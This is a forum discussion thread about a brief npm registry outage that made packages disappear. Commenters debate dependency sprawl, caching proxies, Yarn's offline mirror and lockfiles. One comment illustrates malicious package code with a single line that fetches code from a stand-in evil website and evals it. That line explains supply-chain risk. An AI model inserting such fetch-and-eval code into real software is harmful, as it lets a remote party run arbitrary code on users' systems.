Largely because JavaScript is so broken by default that it is almost required to depend on a whole slew of dependencies for functionality other languages provide in their built-in standard libraries. Furthermore, NPM dependencies are broken down into stupidly small units and versioned rapidly, and NPM enforces very little consistency among transitive dependencies.
Other languages and package management systems don't encourage this kind of insanity.
Well, they aren't mutable/replaceable, at least not since the left-pad incident, when npm announced new rules to prevent package unpublishing. It seems this was an operational bug at npm, Inc.
I wonder how much damage needs to be done with JS/Node before the madness is seriously put to rest. It is absolutely necessary to break backward compatibility and rebuild JS from the start. With WebAssembly this is doable (no excuses!) and we already have a nice tag to declare which script language to use.
This is not possible, you ask?
In fact, JS/CSS is the most viable of all the stacks to move forward. Let's use the "advantage" that any JS library/ecosystem dies fast and put out enough hipster propaganda declaring the ultimate solution.
Is it too hard? JS is so bad that fixing it is easy. You only need more than the week it originally took to build it.
As a counterpoint, couldn't any sufficiently complex structure be called a hack and a house of cards, when you really dig down into how it's put together? Mm, maybe not any - as some complex systems are well tested with solid architecture - but some, or most...
"Have you ever noticed that anybody driving slower than you is an idiot, and anyone going faster than you is a maniac?" --George Carlin
I think the software version of this is: any system with more structure than your program is an over-engineered monstrosity, and any system with less structure than your program is a flakey hack.
A "house of cards" implies that you don't have to dig to topple it. If you have to really dig down into how it's put together in order to start pulling it apart it isn't really a house of cards.
I don't use npm or node for anything serious, and i don't really have any knowledge of how NPM works, but this isn't the first time i've read this story of a whole bunch of packages disappearing and everybody's builds breaking. If everything is a house of cards, then why don't i hear the same stories about PyPI or gems or crates?
I can't speak for PyPI, but I know Ruby gems has had vulnerabilities in the past. A quick DuckDuckGo will probably suffice to demonstrate that. I'm not saying NPM is a great system, but it does seem to me that most systems have flaws, and any system that is as heavily used as NPM is likely to have them surface faster than other systems.
As of this writing, aren't we still waiting to see what the problem was inside NPM that caused this user's packages to disappear?
It might well have been technical. It might well have been managerial. It very likely involved elements of both. But don't you think it's best to save the Monday morning quarterbacking for Monday morning, when all the facts are in?
Because it is... It's Molochian complexity heaped on top of layers of excrement and duct tape, and we have collectively entered a state of mass Stockholm syndrome about the situation.
I really would love to ditch web dev and all its myriad tendrils, and go back to native desktop software.
Somehow I imagine a native C desktop dev and a web developer meeting in no-man's land, each escaping from their own nightmare with that line on their lips, starting with "Don't run in this direction-"
At my job we do native C and C++, some Java, some C#, scripting in Shell, Python, and Perl. When the left-pad incident happened someone said something to the room about it, we all looked it up, and spent a good 15 minutes mind-boggled, laughing and being grateful we weren't web devs. "Wait, you're telling me these people need NPM and GitHub to deploy? Seriously?"
I'm not the poster you're replying to, but I think I understand it.
npm is not just their package management tool... the way most people use it, it depends on someone else's package registry/repository to deploy to your own servers.
And github is someone else's source code management tool/server.
As a matter of policy, if I can't have something on my own server (or one my org controls) I don't get to rely on it to deploy/run my application.
So I think I get the parent's comment... it's a really foreign situation, to me, to depend on the availability of stuff like this on servers I (or my org) don't control in order to deploy my application.
I'm sure the people who depend on these things look at me and say "Wait. You have to set up your own package repository and source control before you can deploy instead of using all this nice stuff that's available in the cloud? Seriously?"
Yeah. I've been on both sides of this coin. If I'm deploying cloud software (which I am, these days), then I have no problem relying on cloud software to make that deployment smoother. But if I ever go back to writing native applications, I sure as hell won't be reliant on the internet in order to manage intranet deployments. These are two different paradigms, and what works well in one doesn't make any sense in the other.
A public package manager and a public source code management tool, both of which are outside of your control. You should be able to deploy from a local [verified and audited] cache of your dependencies.
That's a good goal to strive for, but it isn't necessary or practical for everyone. Maintaining local/hosted artifact caches, verifying them, and auditing them is a big hassle, and unless you make something (e.g. fintech, healthtech) that might need such an audit or emergency release, it might not be worth the trouble.
Itty bitty company making a social website on a shoestring budget/runway with very few developers? Might just be worth postponing a release a day or two if NPM or GitHub are having issues.
How does virtualenv make maintaining, auditing, and using a local mirror of dependencies trivial? Seems to me I can download a poisoned package into a venv cache just as easily as I can download it with wget, and unless I take the time to check, I'm none the wiser either way.
I was referring specifically to not being able to deploy due to a package manager being down. Of course there are still issues that can crop up with using virtualenv.
I haven’t dug too much, but I believe at my work, we run a server that hosts all our jars, and is the source of truth for all our builds. Nothing that’s been checked in goes straight to the Internet (you can add new dependencies to uncommitted code). And we’re only ~30 devs.
And you should also be aware of what it takes to rebuild your stack, and have something in place if that disappears. If you think it's OK to rely on external tools like that to build your system, you deserve all the fallout you get when it fails.
Eh, I like desktop development and I've been making desktop apps for 20+ years. Before I got Windows 95 I was even trying to make my own DE for DOS in Turbo Pascal, and before that in GW-BASIC :-P. I love the desktop.
Web stuff, on the other hand, can die a fiery death as far as I am concerned; together with mobile stuff it is the source of everything wrong with the desktop today :-P.
Yarn (which is an alternative to npm) uses a global cache [1] on your machine, which speeds things up but probably also protects you from immediate problems in cases like the one currently in progress (because you would probably have a local copy of e.g. require-from-string available).
Already counting down the days before yarn is considered old and broken and people are recommending switching to the next hot package manager/bundler...
yarn is one of those things coming out of the JS world that is actually really well made. yarn, typescript, react; say what you want about js fatigue, these are rock-solid, well-tested projects that are really good at what they do.
A major reason for the high tool churn in that ecosystem is how many of those tools are not designed from the ground up, don't quite solve the things they ought to, or solve them in really weird ways (partly due to the low barrier to entry). But that doesn't mean all of it deserves that label.
Can't say anything about react, but yes: yarn and typescript are good.
This is coming from a long time Java programmer who still likes Java and Maven but now might have a new favourite language.
This is made even more impressive by the fact that it is built on the mess that is JS. (Again: I'm impressed that it was made in three weeks; I just wish a better language had been standardized.)
It baffles me that technologists commonly complain about new technology. As far as I can tell, your complaint boils down to "people should stop making and switching to new things". I find it hard to understand why someone with this attitude would be a technologist of any kind, and I find the attitude really obnoxious.
I take it that you've never had to work at a big organization? When you have multiple teams in different offices, it's incredibly difficult to constantly "herd cats" and point everyone to $latest_fad. And when you DO by some miracle get everyone (devs and management) to switch to $latest_fad, it's a huge pain to go back through and bug test/change every process to accommodate the new software.
I don't think "people should stop making and switching to new things" is a fair distillation of the parent comment, as it seemed like they were just expressing frustration at the blistering pace the Javascript community is setting.
Independent teams providing business capabilities through APIs would mostly eliminate the need to keep consistent technologies as long as the interface design follows shared guidelines.
Most companies of any size are allergic to "pick your own toolchain" development strategies. The infrastructure team has to support them. Someone has to be responsible for hiring. Security needs to be able to review the environment. Employees should be able to be moved between teams. And so forth.
Sure, I suppose devops can mitigate the infrastructure support problem, but overall most companies strongly prefer standardization.
No. My complaint is that things never get fixed properly. The complex problems around software distribution (which proper package managers have made a good stab at solving for decades) are ignored in favour of steamrollering over the problems with naive solutions and declaring that everything "just works", only for the wheels to come off a few years later when they run into a dead end which many of us saw from miles off.
This is particularly true for package/dependency management, but the attitude is found more broadly.
For what it's worth, the javascript world isn't alone here. Python, with its new Pipfile/pipenv system is on its, what, fifth, sixth? stab at solving package management "once and for all" and it's all truly dire and not something I depend on when I have the choice.
Nix solves pretty much all of these problems and a few more, but I expect it to be a decade or so before people realize it.
I'm not complaining about new things. These aren't new things. They're about a decade behind the curve.
Because each thing has a constant price in learning effort that is familiarizing yourself with its idiosyncrasies, which you have to pay even if you're experienced in the domain. When tools constantly get replaced instead of improved, you keep paying that price all the time.
> Because each thing has a constant price in learning effort
That's not, in my experience, how it works. Learning your first tool (or language) takes a lot of time. Learning your second is quicker. By the tenth, you're able to learn it by skimming the README and changelog.
It works like this for languages too, at least for me. My first "real" language (aside from QBasic) was C++ and it took me 3-4 years to learn it to an acceptable degree. Last week I learned Groovy in about 4 hours.
It still "adds up", but to a much lower value than you'd think.
But it does, you're just focusing on the other component of learning.
Put another way, for a new tool, learning cost is a sum of a) cost of learning idiosyncrasies of that tool, and b) cost of getting familiar with the concepts used by it.
You're talking about b), which is indeed a shared expense. But a), by definition, isn't. And it's always nonzero. And since new tools are usually made to differ from previous ones on purpose ("being opinionated", it's called), even though they fix some minor things, this cost can be meaningful. And, it adds up with every switch you need to do.
Some of it is a normal part of life of a software developer, but JS ecosystem has taken it to ridiculous extremes.
My argument is that the a) part's cost is indeed non-zero, but - contrary to what you say - trivial in a vast majority of cases. It's just my personal experience, but it happened every single time I tried to learn something: learning "what" and "why" took (potentially a lot of) time, but learning "how" was a non-issue, especially if a "quick reference" or a "cheat sheet" was available. I also disagree that the a) part is never shared between tools: there are only so many possible ways of doing things, but a seemingly infinite supply of tools for doing them. The idiosyncrasies are bound to get repeated between tools and, in my experience, it happens pretty often.
As an example, imagine you're learning Underscore.js for the first time. It's a mind-blowing experience, which takes a lot of time because you have to learn a bunch of crazy concepts, like currying, partial application, binding, and others. You also have to learn Underscore-specific idiosyncrasies, like the order of arguments passed to the callback functions and the like - mostly because you are not yet aware which things are important to know and which are just idiosyncrasies.
Now, imagine you know Underscore already and have to learn Lo-dash or Ramda.js. As the concepts remain very similar, you only need to learn a few conventions, which are different in Ramda. But! Even then, you don't have to really learn all of them to use the library effectively. It's enough to keep the diff of the Underscore and Ramda conventions in mind: learning that, for example, the order of arguments passed to callbacks differs is enough; you can then check the correct order in the docs whenever you need. You know where to find that piece of information, you know when it matters and, by extension, when it's not a concern. There is no need to waste time trying to learn trivia: not doing something is always going to be the fastest way of doing it. By your second library, you start to recognize trivia and are able to separate it from information that matters. Learning prelude.ls afterward is going to take literally 30 minutes of skimming the docs.
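To make that concrete, the "diff" between those libraries is mostly just this kind of convention (assuming both packages are installed; `double` is made up):

    const _ = require('underscore');
    const R = require('ramda');

    const double = (x) => x * 2;

    // Underscore/Lodash: data first, callback second, not curried by default.
    _.map([1, 2, 3], double);        // => [2, 4, 6]

    // Ramda: callback first, data last, auto-curried, so leaving the data off
    // gives you a reusable function.
    R.map(double, [1, 2, 3]);        // => [2, 4, 6]
    const doubleAll = R.map(double);
    doubleAll([1, 2, 3]);            // => [2, 4, 6]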
This is just an example, but it worked like that for me in many cases. When I switched from SVN to Bazaar, for example, it took quite a bit of time to grok the whole "distributed" thing. When I later switched from Bazaar to Git it took me literally an hour to get up to speed with it, followed by a couple more hours - spaced throughout a week or two - of reading about the more advanced features. Picking up Mercurial after that was more or less automatic.
I guess all of this hinges upon the notion of the level of familiarity. While I was able to use bzr, git and hg, it only took so little time because I consciously chose to ignore their intricacies, which I knew I wouldn't need (or wouldn't need straight away). On the other hand, you can spend months learning a tool if your goal is total mastery and contributing to its code. But the latter is very rarely something you'd be required to do; most of the time a level of basic proficiency is more than enough. In my experience, the cost of reaching such a level of proficiency becomes smaller as you learn more tools of a particular kind.
That's the reason I disagree with your remark that that cost is "constant". It's not, it's entirely dependent on a person and the knowledge they accumulated so far. Learning Flask may take you a week if you're new to web development in Python, but you could learn it in a single evening if you worked with Bottle already. On a higher level, learning Elixir may take you months, but you could also accomplish it in a week, provided that you already knew Erlang and Scheme well.
So that's it - the cost of learning new tools may be both prohibitive and trivial at the same time, depending on a prior knowledge of a learner. The good thing about the "prior knowledge and experience" is that it keeps growing over time. The amount of knowledge you'll have accumulated in 20 years is going to be vast to the extent that's hard to imagine today. At that point, the probability of any tool being genuinely new to you will hit rock bottom and the average cost of switching to another tool should also become negligible.
To summarize: I believe that learning new tools gets easier and easier with time and experience and - while never really reaching 0 - at some point, the cost becomes so low that it doesn't matter anymore (unless you have to switch really often, of course).
I'm not sure. I did it because of Jenkins Pipeline DSL; I learned enough to write ~400 loc of a build script from scratch. I was able to de-sugar the DSL and wrap raw APIs with a DSL of my own design (I'd say that I "wrote a couple of helper functions", but the former sounds way cooler...). I did stumble upon some gotchas - the difference between `def` and simple assignment when the target changes, for example.
EDIT: I wonder, is that level of proficiency enough for you to at least drop the scare quotes around "learn"? I feel that putting the quotes there is rather impolite.
> did you skim some docs and just learn what Groovy should be?
As I elaborate on in the comment below, there are different levels of proficiency and I never claimed mastery - just a basic proficiency allowing me to read all of the language constructs and write, as mentioned, a simple script from scratch, with the help of the docs.
> And did you already know any Java beforehand?
Well, a bit, although I haven't worked with it professionally in the last decade. However, knowing Java wouldn't be enough to make learning Groovy that fast - I have another trump card up my sleeve when it comes to learning programming languages. You might be interested in a section of my blog here: https://klibert.pl/articles/programming_langs.html if you want to know what it is. To summarize: I simply did it more than 100 times already.
> the scare quotes around "learn"? I feel that putting the quotes there is rather impolite
When I say I've learned (or learnt) a programming language, I mean more than a 4-hour jump start to basic proficiency level. Perhaps I was letting off some steam over the wild claims many programmers make regarding their PL expertise.
Did you know that Jenkins Pipeline cripples Groovy so that not all of its features are available - specifically the Collections-based methods that form the basis of many DSLs?
> Did you know that Jenkins Pipeline cripples Groovy
Yes. I've run into some limitations; first because of the Pipeline DSL, and when I ditched it in favor of normal scripting I ran into further problems, like Jenkins disallowing the use of `instanceof` (due to a global configuration of permissions, apparently - I don't have administrative rights there) and many other parts of the language. It was kind of a pain, actually, because I developed my script locally - mostly inside groovysh - where it all worked beautifully, and it mysteriously stopped working once uploaded. A frustrating experience, to say the least.
> over the wild claims many programmers make regarding their PL expertise.
I believe I'm a bit of a special case[1] here, wouldn't you agree? Many of the languages on that list I only learned about; many others, though, I actually learned, writing at least several thousand lines of code in each. It's got to be at least 30, I think? I'd need to count.
Anyway, I argue that such an accumulation causes a qualitative difference in how you learn new languages, allowing for rapid acquisition of further ones. It's like in role-playing games, if you buff your stats high enough you start getting all kinds of bonuses not available otherwise :)
[1] If I'm not and you know of someone with the same hobby, please let me know! I'd be thrilled to talk to such a person!
The problem isn't with that one tool alone. The problem is with the entire ecosystem, in which all the tools get regularly replaced by "better" ones. It all adds up.
To be precise, new tools are continuously created to address the weaknesses of other tools. This happens in other languages, just more slowly due to smaller community sizes.
"new tools are continuously created to address the weaknesses of other tools, instead of fixing those weaknesses in those other tools" - FTFY.
> This happens in other languages, just more slowly due to smaller community sizes.
Yeah, my point is that there is a cost to learning a new tool; the faster new tools replace the old ones (instead of someone fixing the old ones), the more often you have to pay that cost.
What ideally should be happening is that existing tools get incrementally upgraded to fix issues and add improvements rather than scrapped and replaced as if they're disposable.
To be completely fair, it isn't exactly drop-in. There are new commands for a bunch of things, mainly around adding new packages locally and globally. I led the yarn switch effort on my direct team and had people coming to me weeks afterwards asking how to do X because of the different commands.
I suspected that someone would mention this, but the fact of the matter is both systems are mostly interoperable. The switch from npm to yarn would be nothing like migrating from Gulp + Browserify to Webpack.
To switch to yarn, I printed out a one-page cheat sheet and taped it to my wall. I’ve had one blunder in the time I’ve used it (misunderstanding what `yarn upgrade` did x_x), but it was easily reverted.
Even in this relatively close case, it's not a zero-overhead transition. There are some changes. There are some new behaviours. You still need to know which things really work exactly the same and where the differences come from even if those differences are only minor. You always need due diligence about whether a new tool is reliable, future-proof, trustworthy, etc. And that's all after finding out about the new tool and deciding this one is actually worth looking into.
Multiply all of that by the absurd degree of over-dependence and over-engineering in the JS ecosystem, and it's entirely fair to question whether the constant nagging overheads are worthwhile.
It _baffles_ me that _technologists_ (whatever that means) dismiss others' writing without actually reading it. It's not us, the detractors, complaining about using new technology because it's "new". For one, it's not new; it's the n-th underdeveloped iteration of a technology 20 years old. We're not complaining about you using technology; we're complaining about you ignoring advances that are old enough to buy alcohol in the US by now.
The JS ecosystem is pretty well known for changing very fast compared to other mainstream languages. This is a fair point; NPM could implement the local cache without (hopefully) breaking anything.
From my understanding they've always had one, but until npm@5 it wasn't safe for concurrent access (side note: Maven still isn't) and was prone to corruption. I think they're making their way toward true offline caching a la yarn, if they haven't done so already.
We are talking about tools here. Standards are a different beast.
For example, having multiple tools doing the same thing is cool because you have the choice to use what fits your needs (e.g. different web servers).
On the other hand, having multiple competing standards for the same job is just technological cancer and mostly the result of some commercial competition (or the attempt to fix a standard by replacing it).
Hmm, in the Java world we pretty much always used a local (company-owned) Maven proxy server, which grabbed packages from public repos and cached them locally to make sure builds still work if public servers were down or slow... or packages disappeared.
I’ve worked at places where the Java devs used Maven Central directly. I’ve also worked at a place where the Node devs use an on-premises copy of dependencies for builds and deploys.
It might not be as standard a practice in the Java world as you think.
Possibly Sonatype Nexus. The Java devs at my workplace use Sonarqube along with Jenkins and Maven on the same server. I believe they communicate through a shared directory on the file system.
(Pet peeve: another product named "Nexus". Please choose original names for your software.)
yarn does local caching on developer laptops. What GP is referring to is having an on-prem private dependency server which acts as a cache and proxy for the centralized public dependency repo.
I never understood the love for package managers that directly hook into and import things into your codebase or repo or, even worse, your servers. I guess the benefit is that "it just works", but the fact that you don't know where a package is coming from surely can't worry just me.
In my company we take the stable version of the library we want to use and self-host it. We've basically added a cache that we manage, and we control what goes into it instead of just trusting a manager. Especially for server-side deployment this is mandatory for security. Things like, say, ffmpeg we never get from random packages; we host them ourselves.
> "I never understood the love for package managers that directly hook and import things into your codebase or repo or even worse servers. I guess the benefit is that "it just works", but the fact that you do not know where a package is coming from can't be worrying just me."
I share your concern. It's a tradeoff: tools that do this are very convenient, and the people who have thought about it have decided in some cases that convenience outweighs the security or stability aspects. And people can make that determination on a case-by-case basis.
This can be a good strategy, it just trades one set of problems for another.
Bleeding-edge packages from possibly compromised hosts, or self-hosted old versions with potential bugs, security issues, and hard-to-find documentation.
Pick your poison, unless you're Red Hat and can spend the time to backport security/bug fixes and maintain a knowledge base for your old versions.
We really need to hear from NPM why this happened.
There is currently no way for a user to remove or unpublish their own established packages from the public NPM registry (a change following the `left-pad` incident).
This leads me to believe this was an internal NPM error. My guess is employee error.
Only for a version less than 24 hours old. You can no longer remove established packages.
A quote from the documentation page you linked:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
> Update - Most of the deleted packages have been restored and installation of those packages should succeed. Nine packages are still in the process of restoration.
> Jan 6, 20:12 UTC
> Beginning at 18:36 GMT today, 106 packages were made unavailable from the registry. 97 of them were restored immediately. Unfortunately, people published over 9 of them, causing delays in the restoration of those 9. We are continuing to clean up the overpublications. All installations that depend on the 106 packages should now be working.
Hard to believe that fewer than a hundred packages can cause so many issues. NPM's dependency hierarchy is pretty insane.
Gah. Moments like these always give me a bit of panic, since I realize that so much of my software relies on external sources.
Relying on npm, Atlassian/GitHub etc. really hurts when stuff like this happens. Issues always get resolved, but cases such as the GitLab incident should be enough reason to always keep some local copies around.
I've stopped wondering about NPM's structure. But still: our bog-standard in-house Java development setup would be unaffected by this class of problems. You need some kind of private Maven repository, and Nexus or Artifactory automatically mirrors downloaded dependencies. And on top of that, versions are pinned by default. So new malicious versions wouldn't be used either. We could safely build new hotfix releases even with Maven Central 100% down or compromised.
Granted, we do depend on bitbucket. However, I am honestly scared to self-host our code. This is a small but old shop, so the entire code base is easily several million dollars worth in man-hours alone. And then again, it's git, so if push comes to shove, we could easily and quickly spin up an internal gitlab instance and push our stuff there to get back up.
npm does pin versions by default (although originally they did not). The fact that you _need_ to have a local mirror for Maven isn't really a plus for Java. You can get a local mirror or similar setup for npm also.
> Gah. Moments like these always gives me a bit of panic, since I realize that so much of my software relies on external sources.
Install an instance of Sonatype Nexus, create a proxy-repo for npm (and Maven if you also use Java) and that's it.
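For npm itself, pointing everything at such a proxy is a one-line change in `.npmrc`; the host and repository path below are just placeholders for wherever your Nexus/Artifactory instance lives:

    registry=https://nexus.example.com/repository/npm-proxy/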
What, however, won't be caught is Docker (because that crap insists on directly talking to the Dockerhub servers, which is a giant security hole waiting to happen) and PHP composer (because it likes to pull dependencies via git from GH, so no caching there).
> You can setup mirrors for dockerhub... Or any docker registry.
But you can't make dockerd talk to this mirror by default, unless you're running the fossilized Red Hat fork. That is the problem: if you want to use Docker, you must open up your server to the Internet - and to the entire Internet at that, as the Docker infrastructure is load-balanced and there are no guarantees the IPs will stay stable.
That does not work as soon as you use node modules that come with native components which have to be recompiled for the machine, and there are many of these.
Colleagues have been bitten by this - one used OS X 10.11, the other 10.12, and they experienced weird bugs from it. The bugs went away once they kicked node_modules out of git.
Yeah, it’s an annoying problem. Maybe you could gitignore the *.node (the native module file extension) files only. But I’m not sure how you’d rebuild those “on demand” after a checkout without running 'npm install' from the top level.
That has some advantages, but some really big drawbacks as well:
- Incredibly slow git operations unless you use the perfect options every time (good luck, new devs).
- Requires either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read.
- Actually understanding the diffs you read. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.
This was the officially recommended solution for long, but suffers from a few issues. Most notably for me is that pull requests that change any dependencies become impossible to read (on github at least).
Having additional copies is always a good idea, but you already get that by just installing the modules on developers' machines.
At some point you have to trust a third party. Even if you run your own hardware, you still depend on power and internet provided by someone else. And unless you are a massive company, time is typically spent much better on other things than hosting your own NPM packages and git repos.
I don't think there is any part of my little software empire that is dependent on code for which I don't have the source or underlying .dll checked into source control.
It's part of your project. You absolutely need a copy of it.
I take it you're replying to me? My little software empire also keeps local copies, but that kind of defeats the purpose of using git for teamwork or a package manager to keep dependencies in check.
These are building blocks in a normal dev environment, and it would take me massive amounts of time to manage everything on my own.
The local copies are fragile and not as easily shared.
You've lost me. Why would it take more time to check in your dependencies and have the rest of your team get them out of source control? All the package manager would do would be to download them off the internet to the same location. Might as well only have one guy do that once and be done with it.
You need to archive them somewhere anyway (to mitigate the issue we're discussing here), so why not keep them in the obvious place?
This is why I develop on Sourcetree for Github/Travis/Heroku inside a Dropbox folder. It gives another layer of flexibility and redundancy. If Dropbox fails, all I lose is filesystem sync - and one type of restoration - for a short while. (Bluntly, Github and Dropbox provide very similar services for synchronizing code between computers.)
Having a redundant array of independent cloud providers seems the ideal state. This is the most effective way to provide a single source of truth without it becoming a single point of failure.
> "
Several packages including "require-from-string" are currently unavailable. We are aware of the issue and are working to restore the affected user and packages. Please do not attempt to republish packages, as this will hinder our progress in restoring them.
Posted 4 minutes ago. Jan 06, 2018 - 19:45 UTC
Late to the party, but can't wait for the technical write up on this.
I think npm has been a headache for everyone at some point, which is one of the main reasons I started contributing to Yarn. I think npm has done a lot of good work in the past year to respond to the necessary change, so kudos to them for their work; however, it's nowhere near the rock-solid package manager that we need. If the JavaScript ecosystem is ever to be taken seriously, and not as a toy, it has to be more reliable.
Ergonomically, I currently think it's ahead of many other package managers because of how simple it is to get running. The number of "gotchas" after npm install is nothing to shake a stick at, though.
One of the things you can do to get builds that aren't as susceptible to npm registry issues is configuring an offline mirror [1].
From the post:
"Repeatable and reliable builds for large JavaScript projects are vital. If your builds depend on dependencies being downloaded from network, this build system is neither repeatable nor reliable.
One of the main advantages of Yarn is that it can install node_modules from files located in file system. We call it “Offline Mirror” because it mirrors the files downloaded from registry during the first build and stores them locally for future builds."
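In practice the setup from the post amounts to a couple of `.yarnrc` lines (the directory name is just an example) plus committing the tarballs Yarn collects there:

    yarn-offline-mirror "./npm-packages-offline-cache"
    yarn-offline-mirror-pruning true

After one online install populates that directory, `yarn install --offline` should be able to build without touching the registry at all.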
Can anyone explain why the npm registry still exists if it cannot guarantee that uploaded packages remain available? The current state makes it pretty useless as a reliable source to base software on, because you never know if you'll be able to build it again in the future.
They should take a good hard look at NuGet, which does not allow packages to be deleted so builds are guaranteed to be reliable. Still doesn't hurt to locally cache packages with software such as Klondike.
They don't allow packages to be deleted. A bug or server issue or mistake caused this. This type of problem has occurred only once before. In general npm has been extremely reliable and performant.
We do this with all of our PHP dependencies at work, they get committed into the project. The upside is that the deployment process is simpler, the server doesn't have to fetch all the libraries you depend on within each deploy and it mitigates all of the risk of left-pad style bullshit.
You can store dependencies in version control so you can continue working when there is a problem with remote package-manager repositories: you just check out the last working version, with all dependencies, from git.
While it may not be the right time to _start_, incidents like this are an excellent reason to consider an internal read-through proxy package repository. The last couple of organisations I've worked with have used Artifactory: https://jfrog.com/artifactory/
And people think I'm crazy for keeping packages in the SCM repo. NPM gets so much abuse, with people depending on them without paying a dime. At least put up a caching proxy hosted by yourself if you depend so much on npm for your operations.
In my org, we use Artifactory as a cache between us and external sources. They have a free version too. I'd encourage everyone to use it, or something like it. Stop pointing your package managers to the public registry.
Minutes before reading this comment I sent an email to our team to verify our artifactory did not download any packages over the weekend. Most likely not as nobody is working (to add a new one or update a version) but better safe than sorry. +1 for artifactory cache.
> Stop pointing your package managers to the public registry.
Unfortunately with NPM this is still awkward, because as soon as you try to shrinkwrap your project, it doesn't just pin the version numbers, it also pins the full source location. That's in direct conflict with (and apparently takes precedence over) using one of the local caching proxies that would otherwise be a useful practical solution to this problem, and the situation gets even more complicated if you have people building at multiple locations and want each to have their own proxy.
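To illustrate, a shrinkwrap/lock entry records not just a version but the exact tarball URL, roughly like this (illustrative fragment with a made-up package):

    "some-package": {
      "version": "1.0.0",
      "resolved": "https://registry.npmjs.org/some-package/-/some-package-1.0.0.tgz"
    }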
Yarn seems to have a better approach to this. It has a few problems of its own, notably surprising, quiet updates to the lock file when using the default options (IMHO a mistake since the big selling point of Yarn is its deterministic, reproducible behaviour) but at least you can do something resembling a local cache combined with something resembling version pinning, which is the ante for any sane build system.
Don't use shrinkwrap - this comes directly from Laurie Voss, COO of NPM Inc. In my own experience using npm shrinkwrap has been pretty bad.
NPM has its own lockfiles now, similar to yarn.
> It has a few problems of its own, notably surprising, quiet updates to the lock file when using the default options
This I've never noticed. I'm genuinely curious how it would happen. The only way I imagine it might happen is if you do a fresh install with no cache and some of the packages have moved or changed on the registry. Do you happen to have more details?
Some of its commands, notably install, can modify yarn.lock if it's out of sync with package.json, and I think that by default they still do so silently. You can override that modification with various options, but it seems to defeat the point of a tool whose main function is to ensure stable, repeatable builds if something on say your CI server or a developer's machine after a source control merge can wind up with a locally modified yarn.lock that doesn't fetch identical versions of all dependencies to what everyone else is using.
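(For what it's worth, the override I had in mind for CI boxes is the flag that makes the install fail instead of silently rewriting yarn.lock:)

    yarn install --frozen-lockfile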
Edit: Also thanks for the tip about npm's new locking mechanism. Apparently that arrived with NPM 5. I just checked, and we have developer machines here that were last updated well under a year ago and are still on NPM 3, and that had itself been installed along with something like the third new major version of Node in not much over a year. I don't know how anyone is supposed to do development intelligently while the most fundamental tools for things like dependency management are bumping a major version and radically changing how they do even the most basic and essential things literally every few months. :-(
It is fundamentally more secure, as it functions as a private, controlled proxy for the public repo. It also solves some other nasty gotchas, such as someone pulling a left-pad joke on you, and gives you reproducible installs: all packages are cached, so your build servers and dev systems get the same version of every package (if properly used with shrinkwrap-style solutions, or even without, if handled carefully).
We self-host Artifactory. If our internal instance goes down, it's always possible to fall back to the public registry for the language (npm, Maven, pip, etc.). It's far more unlikely for our Artifactory and the public registry to go down simultaneously.
With npm 4, things went south and never recovered for us. We use Macs, PCs and Linux machines, and nowadays we fear `npm i` like the plague. I don't care if it's the registry, the executable, the stupid package-lock.json, a Node/npm version mismatch or an installer script - the end result is frustration.
This is insane. This is like Google changing their v1 APIs, except worse, since ANYONE could come in and put new malicious packages up in their place. I say this as a firm supporter of Node and the ecosystem - this should NEVER EVER be allowed to occur. This completely erodes the trust model based around "popular packages" even further - the only saving grace is that hopefully most devs are shrinkwrapping their modules.
I wish the NPM community would grow some humility and learn some lessons from how the Debian environment was built. Have sane licensing that allows mirroring, have crypto hashes of packages, have open governance.
The "wild west" model is where there is no maintainer or distributor between the developer and consumer that is allowed to perform any sort of quality control or sanitisation. That sounds good from a naive standpoint - who needs this busybody middleman anyway? But the problem is that authors tend not to be great maintainers. Authors can (and do) remove packages at any time, make changes to packages without bumping version numbers, upload subtly broken versions or possibly make user-hostile changes which the community can then do nothing about short of creating a fork (which is messy switching over dependencies to a different package name). And that's not even to go into typo-squatting.
In short, package authors don't tend to care about much more than getting their package to work, somehow, anyhow. Often only the latest version of that package, too. And they don't always have an eye on interoperability with other packages, or consistency across a collection. Maintainers who create a "distribution" of software that works well together can collaboratively make decisions that are in the community's best interest. The "wild west" model is unilateral, the "maintained" model is multi-lateral.
>The "wild west" model is where there is no maintainer or distributor between the developer and consumer that is allowed to perform any sort of quality control or sanitisation.
That's not entirely true. Maintainers or distributors aren't required under the "wild-west" model, but that's not the same as anything being disallowed. It's up to the community and the developer to do their own due diligence. The "wild west" model is just the free software model, it's just the lack of some central authority limiting user freedom for the good of the community.
Rather, it's the "distribution" model which forbids anything not approved by the list of official maintainers. All of the problems you list with package authors still exist, but you have fewer options as a developer should they arise.
Why Node.js comes with a client for a for-profit company still baffles me. The NPM team has proven time and time again that they are not competent enough to handle this responsibility, yet they are given a free ride by the Node.js Foundation.
Node.js package manager SHOULD BE COMMUNITY OWNED/DRIVEN
The sheer number of software development organizations who cannot function when github or their package repository happens to be unavailable (for whatever reason) is incredibly disheartening.
Was just discussing this elsewhere online. Package management is broken (or incomplete, depending on your viewpoint). What's needed IMO is the following:
1. Allow a single package file, including multiple clauses (or sub-files, whatever) for different languages. Let me manage my Angular front-end and Flask back-end in the same file. A single CLI tool as well - Composer and Bower aren't all that different.
2. Be the trusted broker, with e.g. MD5 checking, virus scanning, some kind of certification/badging/web of trust thing. Let developers know if it's listed, it's been vetted in some way.
3. Allow client-side caching, but also act as a cache/proxy fetch for package retrieval. That way, if Github or source site is down, the Internet doesn't come to a screeching halt. I see the value of Satis, but it's a whole additional tool to solve just one part of this one problem.
4. Server-side dependency solver. Cache the requests and give instant answers for similar requests. All sorts of value-adds in analytics here, made more valuable by crossing language boundaries.
5. Act as an advocate for good semver, as part of the vetting above.
NOTE: These features are not all-or-nothing, I believe there's value from implementing each one on its own. Also note that nothing here should lock people into one provider for these services. There's a market to be made here.
TL;DR: "no malicious actors were involved in yesterday’s incident, and the security of npm users’ accounts and the integrity of these 106 packages were never jeopardized."
A more detailed report will follow in the next few days.
It seems that someone took over the package during its absence from npm and deployed a version 2.0.5. Maybe to avoid any malicious takeover. But there is no version 2.0.5 anymore.
I don't use NPM (or community managed package managers in general), but anyone know why there isn't an LTS feature with packages? So that, when searching packages, if a package is flagged as LTS, you know that it and all its dependencies have long term support and there are contingencies on what happens if the package is abandoned. Obviously, there would need to be a community that reviews and approves packages that aim to be LTS.
